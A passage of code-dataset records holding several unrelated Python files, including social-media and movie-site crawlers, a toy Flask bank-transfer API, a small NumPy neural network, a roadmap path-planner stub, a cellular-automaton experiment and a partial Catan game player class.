source['avatar']\n        type_social = source['type_social']\n        crawler = get_crawler(type_social)\n        logging.info(f'{count}. Fetching info for {link}')\n        if not internal_id:\n            internal_id = crawler.get_internal_id(link)\n        subscribers = crawler.get_subscribers_count(internal_id=int(internal_id), link=link)\n        subscribers.update({'source': source_id})\n        monitor.add_subscribers(dump(subscribers))\n        info = crawler.get_info(internal_id=int(internal_id), link=link)\n        if link == info['link'] and name == info['name'] and avatar == info['avatar']:\n            logging.info(f'Nothing new')\n            continue\n        if link != info['link']:\n            logging.info('Link updated')\n        if name != info['name']:\n            logging.info('Name updated')\n        if avatar != info['avatar']:\n            logging.info('Avatar updated')\n        info.update({'id': source_id})\n        monitor.update_source(dump(info), source_id)\n\n\ndef get_subscribers():\n    sources = monitor.get_sources()\n    write_json_to_file('sources_from_monitor.json', dump(sources))\n\n    count = 0\n    for source in sources:\n        count += 1\n        internal_id = source['internal_id']\n        source_id = source['id']\n        link = source['link']\n        type_social = source['type_social']\n        crawler = get_crawler(type_social)\n
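        # A hedged aside: get_crawler() returns one of the crawler singletons (vk, insta, tw) constructed in __main__ below; a hypothetical standalone call would be:\n        #   crawler = Vk(config['vk_login'], config['vk_password'])\n        #   crawler.get_subscribers_count(internal_id=1, link=link)  # internal_id=1 is illustrative only\n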
        logging.info(f'{count}. Fetching subscriber count for {link}')\n        if not internal_id:\n            internal_id = crawler.get_internal_id(link)\n        subscribers = crawler.get_subscribers_count(internal_id=int(internal_id), link=link)\n        subscribers.update({'source': source_id})\n        monitor.add_subscribers(dump(subscribers))\n\n\nif __name__ == '__main__':\n    monitor = MonitorApi()\n    vk = Vk(config['vk_login'], config['vk_password'])\n    insta = Insta()\n    tw = Tw()\n\n    while True:\n        update_sources()\n        get_subscribers()\n        logging.info('Waiting an hour')\n        time.sleep(3600)\n","sub_path":"start_subscribers_crawler.py","file_name":"start_subscribers_crawler.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"128403625","text":"from flask import Flask, request, jsonify\r\n\r\napp = Flask(__name__)\r\n\r\nCOSTO_TRANSFERENCIA = 0.3\r\n\r\ncuentas = [\r\n    {\r\n        'numero': '3333',\r\n        'cliente': 'Fulano Detal',\r\n        'saldo': 20.5\r\n    },\r\n    {\r\n        'numero': '4444',\r\n        'cliente': 'Aquiles Bailo',\r\n        'saldo': 1234.25\r\n    },\r\n]\r\n\r\n@app.route('/transferir', methods=['POST'])\r\ndef transferencia():\r\n    data = request.json\r\n    cuenta_origen = data['cuenta_origen']\r\n    if cuenta_origen != None and cuenta_origen != '':\r\n        for cuenta in cuentas:\r\n            if cuenta['numero'] == cuenta_origen:\r\n\r\n                print(f\"This is the client's account: {cuenta['cliente']}\")\r\n                saldo = cuenta['saldo']\r\n                monto = data['monto_transferencia']\r\n\r\n                if saldo >= monto + COSTO_TRANSFERENCIA:\r\n                    cuenta['saldo'] = saldo - (monto + COSTO_TRANSFERENCIA)\r\n                    print(f\"About to transfer: {monto}\")\r\n                    return jsonify({\r\n                        'entidad_fincaciera': data['entidad_fincaciera'],\r\n                        'cuenta_destino': data['cuenta_destino'],\r\n                        'monto_transferencia':monto,\r\n                        'descripcion': data['descripcion'],\r\n                    })\r\n\r\n                else:\r\n\r\n                    return jsonify({'error':'Insufficient balance to complete the transaction.'})\r\n\r\n        \r\n        return jsonify({'error':'The requested account does not exist'})\r\n    \r\n    else :\r\n        return jsonify({'error':'No valid account number was provided.'})\r\n\r\n@app.route('/acreditar_transferencia')\r\ndef acreditar_transferencia():\r\n    data = request.json\r\n    cuenta_destino = data['cuenta_destino']\r\n    if cuenta_destino != None and cuenta_destino != '':\r\n        for cuenta in cuentas:\r\n            if cuenta['numero'] == cuenta_destino:\r\n                monto = data['monto_transferencia']\r\n                saldo = cuenta['saldo']\r\n                cuenta['saldo'] += monto\r\n                return jsonify({\r\n                    \"estado_transferencia\":\"Completed\",\r\n                    \"cuenta_destino\": cuenta_destino,\r\n                    \"cliente\": cuenta['cliente'],\r\n                    \"monto_transferencia\":monto,\r\n                    \"saldo_antes\":saldo,\r\n                    \"saldo_despues\": cuenta['saldo'],\r\n                })\r\n\r\n        return jsonify({'error':'The requested account does not exist'})\r\n\r\n    else :\r\n        return jsonify({'error':'No valid account number was provided.'})\r\n\r\nif __name__ == '__main__':\r\n    app.run(debug=True, port=3200)","sub_path":"jep.py","file_name":"jep.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"270658226","text":"#!/usr/bin/python2.7\n# Copyright 2012 JatLeGo Inc. 
All Rights Reserved.\n# Author: andyzh1314@gmail.com (Andy Zhau)\n#\n# The abstract syntax tree of the JTML element.\n\n\nclass JtmlAstElement(object):\n\n\n def __init__(self, spaces=\"\"):\n self.spaces = spaces\n\n\nclass String(JtmlAstElement):\n\n\n def __init__(self, items, spaces=\"\"):\n \"\"\" items could be a single string for triple-quote-string, or a list of\n element for normal string.\n\n \"\"\"\n if not isinstance(items, basestring):\n for item in items:\n assert isinstance(item, (JtmlAstElement, basestring))\n self.items = items\n super(String, self).__init__(spaces=spaces)\n\n def __str__(self):\n if isinstance(self.items, basestring):\n return '\"\"\"%s\"\"\"' % self.items + self.spaces\n return '\"%s\"' % (\"\".join(str(item) for item in self.items)) + self.spaces\n\n\nclass Variable(JtmlAstElement):\n\n\n def __init__(self, name, spaces=\"\"):\n assert isinstance(name, basestring)\n self.name = name\n super(Variable, self).__init__(spaces=spaces)\n\n def __str__(self):\n return \"{%s}\" % self.name\n\n\nclass Tag(JtmlAstElement):\n\n\n def __init__(self, name, id, classes, attributes, content, spaces=\"\"):\n assert isinstance(name, basestring)\n if id is not None:\n assert isinstance(id, (basestring, String, Variable, Function))\n if classes is not None:\n for cls in classes:\n assert isinstance(cls, (basestring, String, Variable, Function))\n if attributes is not None:\n for attr in attributes: assert isinstance(attr, Attribute)\n if content is not None:\n assert isinstance(content, StatementList)\n self.name = name\n self.id = id\n self.classes = classes\n self.attributes = attributes\n self.content = content\n super(Tag, self).__init__(spaces=spaces)\n\n def __str__(self):\n ret = self.name\n if self.id: ret += \"#%s\" % str(self.id)\n for cls in self.classes:\n ret += \".%s\" % str(cls)\n if self.attributes:\n ret += \"[\"\n for index, attr in enumerate(self.attributes):\n if index: ret += \",\"\n ret += str(attr)\n ret += \"]\"\n if self.content:\n ret += \"<%s>\" % str(self.content)\n return ret + self.spaces\n\n\nclass Function(JtmlAstElement):\n\n\n def __init__(self, name, args, spaces=\"\"):\n assert isinstance(name, basestring)\n if args is not None:\n for arg in args:\n assert isinstance(arg, StatementList)\n self.name = name\n self.args = args or []\n super(Function, self).__init__(spaces=spaces)\n\n def __str__(self):\n return \"(%s,%s)\" % (self.name, \",\".join(str(arg) for arg in self.args))\n\n\nclass Attribute(JtmlAstElement):\n\n\n def __init__(self, name, value, condition=None, spaces=\"\"):\n assert isinstance(name, (basestring, String, Variable, Function))\n assert isinstance(value, (basestring, String, Variable, Function))\n if condition is not None:\n assert isinstance(condition, (Variable, Function))\n self.name = name\n self.value = value\n self.condition = condition\n super(Attribute, self).__init__(spaces=spaces)\n\n def __str__(self):\n if self.condition is None:\n return \"%s=%s\" % (str(self.name), str(self.value))\n return \"%s?%s:%s\" % (str(self.name), str(self.condition), str(self.value))\n\n\nclass StatementList(JtmlAstElement):\n\n\n def __init__(self, spaces=\"\"):\n self.statements = []\n super(StatementList, self).__init__(spaces=spaces)\n\n def AddStatement(self, statement, spaces=\"\"):\n assert isinstance(statement, (String, Variable, Function, Tag))\n if spaces: statement.spaces = spaces\n self.statements.append(statement)\n\n def __str__(self):\n return self.spaces + \"\".join(\n str(statement) for statement in 
self.statements)\n","sub_path":"dsc/tools/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":3702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"438758883","text":"import numpy as np\n\n# network with 14 inputs, one hidden layer of 7 nodes and one output node\nclass NeuralNet():\n\n    def __init__(self, capas=[14, 7, 1], ratio_aprendizaje=0.001, iterations=4100):\n        self.parametros = {} # weights and biases are stored here\n        self.capas = capas\n        self.ratio_aprendizaje = ratio_aprendizaje\n        self.iterations = iterations\n        # self.perdida = []\n        self.X = None\n        self.y = None\n\n    def init_pesos(self):\n        # initialize the weights from a random normal distribution\n\n        np.random.seed(1) # set the random seed (a number used to initialize a pseudo-random number generator)\n        self.parametros[\"W1\"] = np.random.randn(self.capas[0], self.capas[1])# this weight matrix will have shape 14 x 7\n        self.parametros['b1'] = np.random.randn(self.capas[1], ) # the first bias is a vector of size 7 because there are 7 hidden nodes\n        self.parametros['W2'] = np.random.randn(self.capas[1], self.capas[2]) # the second weight matrix is 7 x 1 because there are 7 hidden nodes and one output node\n        self.parametros['b2'] = np.random.randn(self.capas[2], ) # size one because there is only one output\n\n    def relu(self, Z):\n\n        # relu applies an elementwise threshold where values below 0 are set to 0\n        # this implements relu for matrices, since we mostly deal with arrays rather than single values\n        return np.maximum(0, Z)\n\n    def sigmoide(self, Z):\n        # The sigmoid function takes real numbers in any range and squashes them to a real value between 0 and 1.\n\n        return 1.0 / (1.0 + np.exp(-Z))\n\n    def entropia_cruzada(self, y, yhat):\n        nsample = len(y)\n        perdida = -1 / nsample * (np.sum(np.multiply(np.log(yhat), y) + np.multiply((1 - y), np.log(1 - yhat + 0.000001))))\n        return perdida\n\n    def forward_propagation(self):\n\n        # Performs forward propagation.\n\n        Z1 = self.X.dot(self.parametros['W1']) + self.parametros['b1']\n        A1 = self.relu(Z1)\n        Z2 = A1.dot(self.parametros['W2']) + self.parametros['b2']\n        y_calculada = self.sigmoide(Z2)\n        perdida = self.entropia_cruzada(self.y, y_calculada)\n\n        # save the computed values\n        self.parametros['Z1'] = Z1\n        self.parametros['Z2'] = Z2\n        self.parametros['A1'] = A1\n\n        return y_calculada, perdida\n\n    def back_propagation(self, y_calculada):\n        # Computes the derivatives and updates the weights and biases.\n\n        def dRelu(x):\n            x[x <= 0] = 0\n            x[x > 0] = 1\n            return x\n\n        # compute the derivatives\n        derivada_perdida_respecto_a_y_calculada = -(np.divide(self.y, y_calculada) - np.divide((1 - self.y), (1 - y_calculada + 0.000001)))\n        derivada_perdida_respecto_a_sig = y_calculada * (1 - y_calculada)\n        derivada_perdida_respecto_a_z2 = derivada_perdida_respecto_a_y_calculada * derivada_perdida_respecto_a_sig\n\n        derivada_perdida_respecto_a_A1 = derivada_perdida_respecto_a_z2.dot(self.parametros['W2'].T)\n        derivada_perdida_respecto_a_w2 = self.parametros['A1'].T.dot(derivada_perdida_respecto_a_z2)\n        derivada_perdida_respecto_a_b2 = np.sum(derivada_perdida_respecto_a_z2, axis=0)\n\n        derivada_perdida_respecto_a_z1 = derivada_perdida_respecto_a_A1 * dRelu(self.parametros['Z1'])\n        derivada_perdida_respecto_a_w1 = self.X.T.dot(derivada_perdida_respecto_a_z1)\n        derivada_perdida_respecto_a_b1 = np.sum(derivada_perdida_respecto_a_z1, axis=0)\n\n
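        # The four assignments below are a plain gradient-descent step; schematically (a sketch of what the code already does, not new behaviour):\n        #   P = P - ratio_aprendizaje * dL_dP   for each parameter P in {W1, W2, b1, b2}\n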
        # update the weights and biases\n        self.parametros['W1'] = self.parametros['W1'] - self.ratio_aprendizaje * derivada_perdida_respecto_a_w1\n        self.parametros['W2'] = self.parametros['W2'] - self.ratio_aprendizaje * derivada_perdida_respecto_a_w2\n        self.parametros['b1'] = self.parametros['b1'] - self.ratio_aprendizaje * derivada_perdida_respecto_a_b1\n        self.parametros['b2'] = self.parametros['b2'] - self.ratio_aprendizaje * derivada_perdida_respecto_a_b2\n\n    def entrenar(self, X, y):\n        # Train the neural network using the data and labels\n\n        self.X = X\n        self.y = y\n        self.init_pesos() # initialize weights and biases\n\n        for i in range(self.iterations):\n            y_calculada, perdida = self.forward_propagation()\n            self.back_propagation(y_calculada)\n\n            # self.perdida.append(perdida)\n\n    def predecir(self, X):\n\n        Z1 = X.dot(self.parametros['W1']) + self.parametros['b1']\n        A1 = self.relu(Z1)\n        Z2 = A1.dot(self.parametros['W2']) + self.parametros['b2']\n        prediccion = self.sigmoide(Z2)\n        # round the prediction\n        return np.round(prediccion)\n\n    def exactitud(self, y, y_calculada):\n        # compute the accuracy of the computed results against the true labels\n\n        acc = int(sum(y == y_calculada) / len(y) * 100)\n        return acc","sub_path":"neural_network.py","file_name":"neural_network.py","file_ext":"py","file_size_in_byte":4942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"521003966","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\nimport requests\nfrom bs4 import BeautifulSoup\n\nfrom movie import Movie\n\ntry:\n    from HTMLParser import HTMLParser\n    from urlparse import urljoin, urldefrag\nexcept ImportError:\n    from html.parser import HTMLParser\n    from urllib.parse import urljoin, urldefrag\n\nURL = 'http://movie.douban.com/top250'\nheader = {\n    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'\n}\n\n\ndef download_page(url):\n    data = requests.get(url, headers=header).content\n    return data\n\n\ndef parse_html(html):\n    soup = BeautifulSoup(html, \"html.parser\", from_encoding=\"utf-8\")\n    movies_soup = soup.find(\"ol\", attrs={\"class\", \"grid_view\"})\n    movie_list = []\n    for li in movies_soup.find_all(\"li\"):\n        # print li\n        detail = li.find(\"div\", attrs={\"class\": \"hd\"})\n        url = detail.find(\"a\").get(\"href\")\n        name = detail.find(\"span\", attrs={\"class\": \"title\"}).getText()\n        movie = Movie(url, name)\n        movie_list.append(movie)\n\n    next_page = soup.find(\"span\", attrs={\"class\": \"next\"}).find(\"a\")\n    if next_page:\n        return movie_list, URL + next_page[\"href\"]\n    return movie_list, None\n\n\ndef write_to_excel():\n    import xlwt\n    wbk = xlwt.Workbook()\n    sheet = wbk.add_sheet(\"sheet 1\")\n    sheet.write(0, 1, 'tets')\n    wbk.save(\"pytest.xls\")\n\nif __name__ == \"__main__\":\n    write_to_excel()\n    # html = download_page(URL)\n    # url = URL\n    # while url:\n    #     movie_list, url = parse_html(html)\n","sub_path":"net/doupan_crawler.py","file_name":"doupan_crawler.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"270792036","text":"from django.template import Library\nregister = Library()\n\n# returns True if post_tree_element is indent\n@register.filter\ndef is_indent( post_tree_element ):\n    indent_prefix = 'in-'\n    if type(post_tree_element) is not str:\n        return False\n    elif post_tree_element.startswith(indent_prefix):\n        return True\n    else:\n        return False\n\n
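# Usage (in template; a hypothetical sketch, mirroring the usage notes further below):\n# {% if element|is_indent %} ... {% endif %}\n\n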
# returns True if post_tree_element is dedent\n@register.filter\ndef is_dedent( post_tree_element ):\n    dedent_prefix = 'out-'\n    if type(post_tree_element) is not str:\n        return False\n    elif post_tree_element.startswith(dedent_prefix):\n        return True\n    else:\n        return False\n\n@register.filter\ndef get_dent_node_depth( text ):\n    indent_prefix = 'in-'\n    dedent_prefix = 'out-'\n    if text.startswith(indent_prefix):\n        depth = int(text[len(indent_prefix):])\n    elif text.startswith(dedent_prefix):\n        depth = int(text[len(dedent_prefix):])\n    return depth\n\n# Usage (in template):\n# {{ post|post_upvoted_by_user:user_pk }}\n#\n# Results with the HTML:\n# True\n@register.filter\ndef post_upvoted_by_user(post,user_pk):\n    return post.upvoters.filter(id=user_pk).exists()\n\n# Usage (in template):\n# {{ post|post_downvoted_by_user:user_pk }}\n# Results with the HTML:\n# True\n@register.filter\ndef post_downvoted_by_user(post,user_pk):\n    return post.downvoters.filter(id=user_pk).exists()\n","sub_path":"mySite/MCPost/templatetags/MCPost_templatetags.py","file_name":"MCPost_templatetags.py","file_ext":"py","file_size_in_byte":1367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"55251236","text":"#!/usr/bin/env python\n\nimport math\n\nfrom pygraph.classes.graph import graph\nfrom pygraph.algorithms.minmax import heuristic_search\nfrom pygraph.algorithms.heuristics.euclidean import euclidean\n\n\n#=============================== YOUR CODE HERE ===============================\n# Instructions: complete the currently empty RandomizedRoadmapPlanner class.\n#               An instance of this class will be created by the path_planner\n#               node. It should maintain a graph of points and the connections\n#               between them.\n#               The 'plan()' function should find a path between the requested\n#               points, inserting new nodes and edges if necessary. Make sure\n#               that it stops at some point in time if no path between the\n#               points exists.\n#\n# Remark: it will be necessary to test points and line segments for emptiness.\n#         The class is (as usual) ROS-independent, so the actual mechanism of\n#         performing these tests is abstracted by two callback functions, which\n#         the object receives during the construction. In order to test whether\n#         e.g. the point (1, 4) is free you should do:\n#\n#             free = self.point_free_cb((1, 4))\n#\n# Hint: use the standard function 'random.uniform()' to generate the coordinates\n#       for random points.\n#\n# Hint: if you decided to use 'pygraph' library for graph and search\n#       implementations, make sure that the graph object is stored in a member\n#       field called 'graph'. If this is the case, the nodes and edges of the\n#       graph will be automatically visualized by the path_planner node after\n#       each planning request.\n\nclass RandomizedRoadmapPlanner:\n\n    def __init__(self, point_free_cb, line_free_cb, dimensions):\n        \"\"\"\n        Construct a randomized roadmap planner.\n\n        'point_free_cb' is a function that accepts a point (two-tuple) and\n        outputs a boolean value indicating whether the point is in free space.\n\n        'line_free_cb' is a function that accepts two points (the start and the\n        end of a line segment) and outputs a boolean value indicating whether\n        the line segment is free from obstacles.\n\n        'dimensions' is a tuple of tuples that define the x and y dimensions of\n        the world, e.g. ((-8, 8), (-8, 8)). It should be used when generating\n        random points.\n        \"\"\"\n
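        # Hypothetical usage sketch (callback names invented for illustration):\n        #   planner = RandomizedRoadmapPlanner(point_cb, line_cb, ((-8, 8), (-8, 8)))\n        #   path = planner.plan((0.0, 0.0), (2.0, 3.0))\n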
        self.point_free_cb = point_free_cb\n        self.line_free_cb = line_free_cb\n        self.dimensions = dimensions\n        self.point_count=0\n        self.path_graph=graph()\n\n    def plan(self, point1, point2):\n        \"\"\"\n        Plan a path which connects the two given 2D points.\n\n        The points are represented by tuples of two numbers (x, y).\n\n        Return a list of tuples where each tuple represents a point in the\n        planned path, the first point is the start point, and the last point is\n        the end point. If the planning algorithm failed the returned list\n        should be empty.\n        \"\"\"\n        path=[]\n        # initialising the start and end points\n        self.point_count=self.point_count+1\n        start_point=self.point_count\n        self.path_graph.add_node(self.point_count, attrs=[('position', (point1[0], point1[1]))])\n        self.point_count=self.point_count+1\n        end_point=self.point_count\n        self.path_graph.add_node(self.point_count, attrs=[('position', (point2[0], point2[1]))])\n\n        #calculating the distance between two points\n        distance=math.sqrt(math.pow(point1[0]-point2[0],2)+math.pow(point1[1]-point2[1],2))\n        #calculating the heuristic value for A*\n        h=euclidean()\n        h.optimize(self.path_graph)  # the euclidean heuristic scans node positions before searching\n        path_point=heuristic_search(self.path_graph, start_point, end_point, h)\n        for i in path_point:\n            x = self.path_graph.node_attributes(i)\n            path.append(x[0][1])\n\n        return path\n\n    def remove_edge(self, point1, point2):\n        \"\"\"\n        Remove the edge of the graph that connects the two given 2D points.\n\n        The points are represented by tuples of two numbers (x, y).\n\n        Has an effect only if both points have a corresponding node in the\n        graph and if those nodes are connected by an edge.\n        \"\"\"\n        pass\n\n#==============================================================================\n","sub_path":"amr_navigation/src/amr_navigation/randomized_roadmap_planner.py","file_name":"randomized_roadmap_planner.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
{"seq_id":"651293268","text":"import numpy as np\n\nimport matplotlib.pyplot as plt\n\nimport zlib, sys\nimport statsmodels.api as sm\n\n\n\n\n\nclass Automaton():\n    def __init__(self, args, rule, mid=[]):\n        self.rule = rule\n        end = [0 for _ in range(args.time+1)]\n        middle = mid\n        self.initial = end + middle + end \n        self.state = self.initial\n        \n        # convert wolfram rule to list\n        self.wolfram = [int(x) for x in np.binary_repr(self.rule, 8)]\n        #print(\"wolfram vector: \", self.wolfram)\n        #print(\"initial condition:\", mid)\n        self._lambda = sum(self.wolfram)/8\n        \n    @staticmethod \n    def bin_converter(state):\n        total = 0\n        for index, val in enumerate(reversed(state)):\n            total += (val * 2**index)\n        return(total)\n    \n    def simulate(self, args, time):\n        text = str(self.state)\n        for _ in range(time):\n            new_state = []\n            for i in range(0, len(self.state)):\n                new_state.append(self.wolfram[7-Automaton.bin_converter([self.state[i-1], self.state[i], self.state[(i+1)%len(self.state)]])])\n            self.state = new_state\n            text = str(self.state)\n        compressed_text = zlib.compress(bytes(text, \"utf-8\"), args.rate)\n        self.compressed = sys.getsizeof(compressed_text)\n        self.uncompressed = sys.getsizeof(bytes(text, \"utf-8\"))\n        \n        \ndef gros_grey(n):\n    L = [[0], [1]]\n    for _ in range(n-1):\n        Lp = L[::-1]\n        L = [[0]+a for a in L]\n        Lp = [[1]+a for a in Lp]\n        L = L+Lp\n    L = [a+[1] for a in L]\n    return L\n    \ndef lyapunov(x, y):\n    lambdas = []\n    s = 0\n    aut1 = Automaton(args, args.rule, x)\n    aut2 = Automaton(args, args.rule, 
y)\n for t in range(1, args.time+1):\n aut1.simulate(args, 1)\n aut2.simulate(args, 1)\n c1, c2 = aut1.compressed, aut2.compressed\n s += abs(c1-c2)\n #print(abs(c1-c2))\n #lambdas.append(s/t)\n lambdas.append(abs(c1-c2))\n return lambdas\n\n\n\ndef regression(data):\n X = sm.add_constant([i+1 for i in range(len(data))])\n model = sm.OLS(data, X).fit()\n pred_val = model.fittedvalues.copy()\n print(model.params)\n return model.params[1], pred_val\n\ndef cnt(args, t, inits):\n s = 0\n aut1 = Automaton(args, args.rule, inits[0])\n aut1.simulate(args, t)\n c1 = aut1.compressed\n for i in range(len(inits)-1): \n c2 = c1 \n aut1 = Automaton(args, args.rule, inits[i+1])\n aut1.simulate(args, t)\n c1 = aut1.compressed\n s += abs(c2-c1)\n cnt = s/(len(inits)-1)\n return cnt\n \n \nif __name__ == \"__main__\":\n import argparse\n\n # Parse arguments\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--time\", default=1500, type=int, help=\"Number of time steps.\")\n parser.add_argument(\"--len\", default=100, type=int, help=\"Length of initial state if random is true.\")\n parser.add_argument(\"--rule\", default=22, type=int, help=\"Wolfram elementary cellular automaton rule.\")\n parser.add_argument(\"--rate\", default=1, type=int, help=\"Stupen komprese: 0-9\")\n args = parser.parse_args()\n \n c1, c2 = 4, 5\n N = 5\n T = 120\n L = gros_grey(N)\n c = []\n for t in range(T):\n print(\"time: \", t+1)\n c.append(cnt(args, t, L))\n print(c)\n \n slope, pred_val = regression(c)\n plt.plot([i for i in range(T)], c)\n plt.plot([i for i in range(T)], pred_val)\n plt.title(\"Rule: {}, number of initial conditions: {}, slope: {:.3f}\".format(args.rule, len(L), slope))\n plt.xlabel(\"time steps\")\n # plt.ylabel(r'$\\delta_n$')\n #plt.axis('equal')\n plt.show()\n\n\n \n #for i in range(5):\n # cond1, cond2 = c1+i, c2+i\n # x = L[cond1]\n # y = L[cond2]\n # approx = lyapunov(x, y)\n # slope, pred_val = regression(approx)\n # plt.plot([i for i in range(args.time)], approx)\n # plt.plot([i for i in range(args.time)], pred_val)\n # plt.title(\"Rule: {}, initial conditions: {}, {}, slope: {:.3f}\".format(args.rule, cond1, cond2, slope))\n # plt.xlabel(\"time steps\")\n # plt.ylabel(r'$\\delta_n$')\n #plt.axis('equal')\n # plt.show()\n\n\n\n \n\n\n","sub_path":"one_dim/lyapunov_true.py","file_name":"lyapunov_true.py","file_ext":"py","file_size_in_byte":4214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"219118288","text":"# This file contains player-related classes.\n\nfrom enum import Enum, unique\nfrom collections import Counter\nimport re\nimport random\n\n@unique\nclass Resource(Enum):\n DESERT = 0\n BRICK = 1\n GRAIN = 2\n LUMBER = 3\n ORE = 4\n WOOL = 5\n \n def __str__(self):\n return self.name.lower()\n\ndef ResourceFromString(s):\n if not s:\n return None\n s = s.upper()\n for r in Resource:\n # We accept the full name with any capitalization (e.g. 'wool', 'WOOL',\n # 'wOoL', etc.) or the first letter ('w' for WOOL).\n if r.name == s or r.name[0] == s[0]:\n return r\n return None\n\n@unique\nclass DevCard(Enum):\n KNIGHT = 1\n ROAD_BUILDING = 2\n YEAR_OF_PLENTY = 3\n MONOPOLY = 4\n \n def __str__(self):\n return self.name.lower()\n\n\n@unique\nclass Color(Enum):\n RED = 1\n BLUE = 2\n ORANGE = 3\n WHITE = 4\n BLACK = 5\n GREEN = 6\n \n def __str__(self):\n return self.name.lower()\n\ndef ColorFromString(s):\n if not s:\n return None\n s = s.upper()\n for r in Color:\n # We accept the full name with any capitalization (e.g. 
'red', 'RED',\n # 'ReD', etc.).\n if r.name == s:\n return r\n return None\n\ndef inResource(prompt):\n p = re.compile(r'(\\d+)\\s*(\\w+)')\n while True:\n s = input(prompt)\n match = p.match(s)\n if not match:\n print(\"Invalid resource format. Expected '' (like '4w' for 4 wool).\")\n continue\n n = int(match.group(1))\n if n < 0:\n print(\"Invalid number: '{}'\".format(match.group(1)))\n continue\n r = ResourceFromString(match.group(2))\n if r is None or r == Resource.DESERT:\n print(\"Invalid resource: '{}'\".format(match.group(2)))\n continue\n break\n return (n, r)\n\ndef inValLoc(prompt):\n p = re.compile(r\"(\\d\\d?)\\s*,\\s*(\\d\\d?)\")\n while True:\n s = input(prompt)\n match = p.match(s)\n if not match:\n print(\"Invalid format. Format must be 'x,y'\")\n continue\n x = int(match.group(1))\n if x < 0 or x > 10:\n print(\"Invalid x coordinate. x must be in the range [0, 10].\")\n continue\n y = int(match.group(2))\n if y < 0 or y > 16:\n print(\"Invalid y coordinate. y must be in the range [0, 16].\")\n continue\n break\n return (x, y)\n\ndef inValRoll(inroll):\n while True:\n roll = int(input(inroll))\n if roll not in [2,3,4,5,6,7,8,9,10,11,12]:\n print(\"Sorry, not a valid dice roll\")\n continue\n else:\n break\n return roll\n\ndef inAction(prompt):\n while True:\n uprompt = input(prompt)\n if uprompt not in [\"build\", \"trade\", \"ask\", \"devcard\", \"end\"]:\n print(\"You can only build, trade, ask, play a devcard, or end\")\n continue\n else:\n break\n return uprompt\n\n\nclass Player:\n def __init__(self, color, board):\n self.color = color # this player's color\n self.board = board # reference to the CatanBoard object\n self.hand = Counter({Resource.BRICK:4, Resource.LUMBER:4, Resource.WOOL:2, Resource.GRAIN:2}) # the resources this player has (currently set to a default hand)\n self.unplayedCards = 0 # unplayed development cards. Should be dict of Card:probability that they have it\n self.playedCards = [] # played development cards\n self.victoryPoints = 0 # maybe can contain decimals to represent probability\n self.longestRoad = False\n self.largestArmy = False\n self.remaining = Counter() # unplayed roads, settlements, and cities that this player has in their inventory\n\n def updateVPs(self): # do I need this function? 
could update for each action\n        newVP = 0\n        for node in self.nodes.values():\n            newVP += node.structure\n        for card in self.cards:\n            if card == 'VP':\n                newVP += 1\n            elif card == 'Longest Road' or card == 'Largest Army':\n                newVP += 2\n        self.victoryPoints = newVP\n\n\nclass Human(Player):\n    def __init__(self, color, board):\n        Player.__init__(self, color, board)\n\n    def initPlace(self):\n        validSetts = self.board.validInitSetPlace()\n        setLoc = inValLoc(\"Location of Placed Settlement: \")\n        while setLoc not in validSetts:\n            setLoc = inValLoc(\"Location of Placed Settlement: \")\n        neighbors = list(self.board.nodelist[setLoc].neighbors.keys())\n        possRoads = [loc for loc in self.board.nodelist if self.board.nodelist[loc] in neighbors]\n        print(\"Possible Road Directions: {}\".format(possRoads))\n        setRd = inValLoc(\"Location of road end: \")\n        while setRd not in possRoads:\n            setRd = inValLoc(\"Location of road end: \")\n        self.board.buildSettle(self.color, setLoc)\n        self.board.buildRoad(self.color, setLoc, setRd)\n\n    def build(self):\n        while True:\n            uprompt = input(\"city, settlement, road, or devcard?: \")\n            if uprompt not in [\"city\", \"settlement\", \"road\", \"devcard\"]:\n                print(\"can only build a city, settlement, road, or devcard\")\n                continue\n            else:\n                break\n        if uprompt == \"city\":\n            loc = inValLoc(\"What location? (x,y)\")\n            city = {Resource.ORE:3, Resource.GRAIN:2}\n            self.hand.subtract(city)\n            self.board.buildCity(loc)\n        elif uprompt == \"settlement\":\n            loc = inValLoc(\"What location? (x,y)\")\n            settlement = {Resource.BRICK:1, Resource.LUMBER:1, Resource.WOOL:1, Resource.GRAIN:1}\n            self.hand.subtract(settlement)\n            self.board.buildSettle(self.color, loc)\n        elif uprompt == \"road\":\n            fromL = inValLoc(\"From which location? (x,y)\")\n            toL = inValLoc(\"To which location? (x,y)\")\n            road = {Resource.BRICK:1, Resource.LUMBER:1}\n            self.hand.subtract(road)\n            self.board.buildRoad(self.color, fromL, toL)\n        elif uprompt == \"devcard\":\n            devcard = {Resource.ORE:1, Resource.GRAIN:1, Resource.WOOL:1}\n            self.hand.subtract(devcard)\n            self.unplayedCards += 1\n\n    def trade(self):\n        p = re.compile(r'(\\d+)\\s*(\\w+)')\n        maritime = False\n        while True:\n            s = input(\"Who is {} trading with (enter 'maritime' for maritime trades)? \".format(self.color)).strip()\n            if s.lower() == \"maritime\":\n                maritime = True\n                break\n            c = ColorFromString(s)\n            if c is None:\n                print(\"Invalid color.\")\n                continue\n            break\n        if maritime:\n            # TODO: Implement maritime trade.\n            print(\"Maritime trade not supported yet.\")\n        else:\n            nSelf, rSelf = inResource(\"What is {} trading? \".format(self.color.name.lower()))\n            nThem, rThem = inResource(\"What is {} trading? \".format(c.name.lower()))\n            # TODO\n\n    def playDevcard(self):\n        while True:\n            dcard = input(\"What card? Knight, Road Building, Year of Plenty, or 